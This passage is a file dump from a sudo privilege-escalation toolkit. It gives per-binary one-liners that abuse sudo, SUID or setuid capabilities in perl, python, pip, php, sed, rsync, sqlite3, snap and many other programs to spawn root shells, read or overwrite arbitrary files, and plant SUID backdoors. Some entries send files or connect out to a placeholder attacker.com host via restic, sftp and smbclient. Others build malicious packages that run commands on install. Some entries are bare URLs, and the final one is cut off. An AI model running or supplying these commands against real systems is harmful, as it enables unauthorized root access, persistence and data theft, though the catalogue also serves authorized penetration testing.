5 | * LFILE=file_to_write 6 | echo DATA | sudo pandoc -t plain -o "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/paste.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo paste $LFILE 7 | -------------------------------------------------------------------------------- /dbins/pax.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/pax.txt -------------------------------------------------------------------------------- /dbins/pdb.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp) 6 | echo 'import os; os.system("/bin/sh")' > $TF 7 | sudo pdb $TF 8 | cont 9 | -------------------------------------------------------------------------------- /dbins/pdftex.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pdftex --shell-escape '\write18{/bin/sh}\end' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. 
If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which pdftex) . 16 | 17 | ./pdftex --shell-escape '\write18{/bin/sh}\end' 18 | -------------------------------------------------------------------------------- /dbins/perf.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo perf stat /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/perl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo perl -e 'exec "/bin/sh";' 6 | ***** Capabilities ***** 7 | If the binary has the Linux CAP_SETUID capability set or it is executed by 8 | another binary with the capability set, it can be used as a backdoor to 9 | maintain privileged access by manipulating its own process UID. 10 | * cp $(which perl) . 
11 | sudo setcap cap_setuid+ep perl 12 | 13 | ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' 14 | -------------------------------------------------------------------------------- /dbins/perlbug.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;' 6 | -------------------------------------------------------------------------------- /dbins/pexec.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pexec /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/pg.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pg /etc/profile 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/php.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * CMD="/bin/sh" 6 | sudo php -r "system('$CMD');" 7 | ***** Capabilities ***** 8 | If the binary has the Linux CAP_SETUID capability set or it is executed by 9 | another binary with the capability set, it can be used as a backdoor to 10 | maintain privileged access by manipulating its own process UID. 11 | * cp $(which php) . 12 | sudo setcap cap_setuid+ep php 13 | 14 | CMD="/bin/sh" 15 | ./php -r "posix_setuid(0); system('$CMD');" 16 | -------------------------------------------------------------------------------- /dbins/pic.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pic -U 6 | .PS 7 | sh X sh X 8 | ***** Limited SUID ***** 9 | If the binary has the SUID bit set, it may be abused to access the file system, 10 | escalate or maintain access with elevated privileges working as a SUID 11 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 12 | it only works on systems like Debian (<= Stretch) that allow the default sh 13 | shell to run with SUID privileges. 14 | This example creates a local SUID copy of the binary and runs it to maintain 15 | elevated privileges. To interact with an existing SUID binary skip the first 16 | command and run the program using its original path. 17 | * sudo install -m =xs $(which pic) . 18 | 19 | ./pic -U 20 | .PS 21 | sh X sh X 22 | -------------------------------------------------------------------------------- /dbins/pidstat.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * COMMAND=id 6 | sudo pidstat -e $COMMAND 7 | -------------------------------------------------------------------------------- /dbins/pip.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$ 7 | (tty)')" > $TF/setup.py 8 | sudo pip install $TF 9 | -------------------------------------------------------------------------------- /dbins/pip3.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$ 7 | (tty)')" > $TF/setup.py 8 | sudo pip install $TF 9 | -------------------------------------------------------------------------------- /dbins/pkexec.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pkexec /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/pkg.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * It runs commands using a specially crafted FreeBSD package. Generate it 6 | with fpm and upload it to the target. 7 | TF=$(mktemp -d) 8 | echo 'id' > $TF/x.sh 9 | fpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF 10 | sudo pkg install -y --no-repo-update ./x-1.0.txz 11 | -------------------------------------------------------------------------------- /dbins/posh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo posh 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which posh) . 16 | 17 | ./posh 18 | -------------------------------------------------------------------------------- /dbins/pr.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | pr -T $LFILE 7 | -------------------------------------------------------------------------------- /dbins/pry.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pry 6 | system("/bin/sh") 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which pry) . 17 | 18 | ./pry 19 | system("/bin/sh") 20 | -------------------------------------------------------------------------------- /dbins/psftp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo psftp 6 | !/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 
13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which psftp) . 17 | 18 | sudo psftp 19 | !/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/psql.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * psql 6 | \? 7 | !/bin/sh 8 | -------------------------------------------------------------------------------- /dbins/ptx.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ptx -w 5000 "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/puppet.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$ 6 | (tty)\"': }" 7 | -------------------------------------------------------------------------------- /dbins/pwsh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo pwsh 6 | -------------------------------------------------------------------------------- /dbins/python.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo python -c 'import os; os.system("/bin/sh")' 6 | ***** Capabilities ***** 7 | If the binary has the Linux CAP_SETUID capability set or it is executed by 8 | another binary with the capability set, it can be used as a backdoor to 9 | maintain privileged access by manipulating its own process UID. 10 | * cp $(which python) . 11 | sudo setcap cap_setuid+ep python 12 | 13 | ./python -c 'import os; os.setuid(0); os.system("/bin/sh")' 14 | -------------------------------------------------------------------------------- /dbins/python2.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | It runs in privileged context and may be used to access the file system, 3 | escalate or maintain access with elevated privileges if enabled on sudo. 
4 | * sudo python -c 'import os; os.system("/bin/sh")' -------------------------------------------------------------------------------- /dbins/python3.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | It runs in privileged context and may be used to access the file system, 3 | escalate or maintain access with elevated privileges if enabled on sudo. 4 | * sudo python3 -c 'import os; os.system("/bin/sh")' -------------------------------------------------------------------------------- /dbins/rake.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rake -p '`/bin/sh 1>&0`' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which rake) . 
16 | 17 | ./rake -p '`/bin/sh 1>&0`' 18 | -------------------------------------------------------------------------------- /dbins/rb.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/rb.txt -------------------------------------------------------------------------------- /dbins/rc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rc -c '/bin/sh' 6 | -------------------------------------------------------------------------------- /dbins/readelf.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo readelf -a @$LFILE 7 | -------------------------------------------------------------------------------- /dbins/red.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo red file_to_write 6 | a 7 | DATA 8 | . 
9 | w 10 | q 11 | -------------------------------------------------------------------------------- /dbins/redcarpet.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo redcarpet "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/redis.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/redis.txt -------------------------------------------------------------------------------- /dbins/restic.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * RHOST=attacker.com 6 | RPORT=12345 7 | LFILE=file_or_dir_to_get 8 | NAME=backup_name 9 | sudo restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE" 10 | -------------------------------------------------------------------------------- /dbins/rev.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo rev $LFILE | rev 7 | -------------------------------------------------------------------------------- /dbins/rlogin.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/rlogin.txt -------------------------------------------------------------------------------- /dbins/rlwrap.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rlwrap /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/rpmdb.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rpmdb --eval '%(/bin/sh 1>&2)' 6 | -------------------------------------------------------------------------------- /dbins/rpmquery.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. 
If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which rpmquery) . 16 | 17 | ./rpmquery --eval '%{lua:os.execute("/bin/sh")}' 18 | -------------------------------------------------------------------------------- /dbins/rpmverify.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rpmverify --eval '%(/bin/sh 1>&2)' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which rpmverify) . 
16 | 17 | ./rpmverify --eval '%(/bin/sh 1>&2)' 18 | -------------------------------------------------------------------------------- /dbins/rsync.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null 6 | -------------------------------------------------------------------------------- /dbins/rtorrent.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/rtorrent.txt -------------------------------------------------------------------------------- /dbins/ruby.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ruby -e 'exec "/bin/sh"' 6 | ***** Capabilities ***** 7 | If the binary has the Linux CAP_SETUID capability set or it is executed by 8 | another binary with the capability set, it can be used as a backdoor to 9 | maintain privileged access by manipulating its own process UID. 10 | * cp $(which ruby) . 
11 | sudo setcap cap_setuid+ep ruby 12 | 13 | ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"' 14 | -------------------------------------------------------------------------------- /dbins/run-mailcap.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo run-mailcap --action=view /etc/hosts 8 | !/bin/sh 9 | -------------------------------------------------------------------------------- /dbins/run-parts.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo run-parts --new-session --regex '^sh$' /bin 6 | -------------------------------------------------------------------------------- /dbins/sash.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo sash 6 | -------------------------------------------------------------------------------- /dbins/scanmem.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo scanmem 6 | shell /bin/sh 7 | -------------------------------------------------------------------------------- /dbins/screen.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo screen 6 | -------------------------------------------------------------------------------- /dbins/script.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo script -q /dev/null 6 | -------------------------------------------------------------------------------- /dbins/scrot.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo scrot -e /bin/sh 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which scrot) . 
16 | 17 | ./scrot -e /bin/sh 18 | -------------------------------------------------------------------------------- /dbins/sed.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * GNU version only. Also, this requires bash. 6 | sudo sed -n '1e exec sh 1>&0' /etc/hosts 7 | -------------------------------------------------------------------------------- /dbins/service.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo service ../../bin/sh 6 | -------------------------------------------------------------------------------- /dbins/setarch.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo setarch $(arch) /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/setfacl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_change 6 | USER=somebody 7 | sudo setfacl -m -u:$USER:rwx $LFILE 8 | -------------------------------------------------------------------------------- /dbins/setlock.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo setlock - /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/sftp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * HOST=user@attacker.com 6 | sudo sftp $HOST 7 | !/bin/sh 8 | -------------------------------------------------------------------------------- /dbins/sg.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo sg root 6 | -------------------------------------------------------------------------------- /dbins/shuf.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The written file content is corrupted by adding a newline. 
6 | LFILE=file_to_write 7 | sudo shuf -e DATA -o "$LFILE" 8 | -------------------------------------------------------------------------------- /dbins/slsh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo slsh -e 'system("/bin/sh")' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which slsh) . 16 | 17 | ./slsh -e 'system("/bin/sh")' 18 | -------------------------------------------------------------------------------- /dbins/smbclient.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo smbclient '\\attacker\share' 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/snap.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * It runs commands using a specially crafted Snap package. Generate it with 6 | fpm and upload it to the target. 7 | COMMAND=id 8 | cd $(mktemp -d) 9 | mkdir -p meta/hooks 10 | printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install 11 | chmod +x meta/hooks/install 12 | fpm -n xxxx -s dir -t snap -a all meta 13 | sudo snap install xxxx_1.0_all.snap --dangerous --devmode 14 | -------------------------------------------------------------------------------- /dbins/socket.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/socket.txt -------------------------------------------------------------------------------- /dbins/soelim.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo soelim "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/softlimit.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo softlimit /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/sort.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo sort -m "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/split.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The shell prompt is not printed. 6 | sudo split --filter=/bin/sh /dev/stdin 7 | -------------------------------------------------------------------------------- /dbins/sqlite3.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo sqlite3 /dev/null '.shell /bin/sh' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. 
To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which sqlite3) . 16 | 17 | ./sqlite3 /dev/null '.shell /bin/sh' 18 | -------------------------------------------------------------------------------- /dbins/sqlmap.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')" 6 | -------------------------------------------------------------------------------- /dbins/ss.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ss -a -F $LFILE 7 | -------------------------------------------------------------------------------- /dbins/ssh-agent.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ssh-agent /bin/ 6 | -------------------------------------------------------------------------------- /dbins/ssh-keygen.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
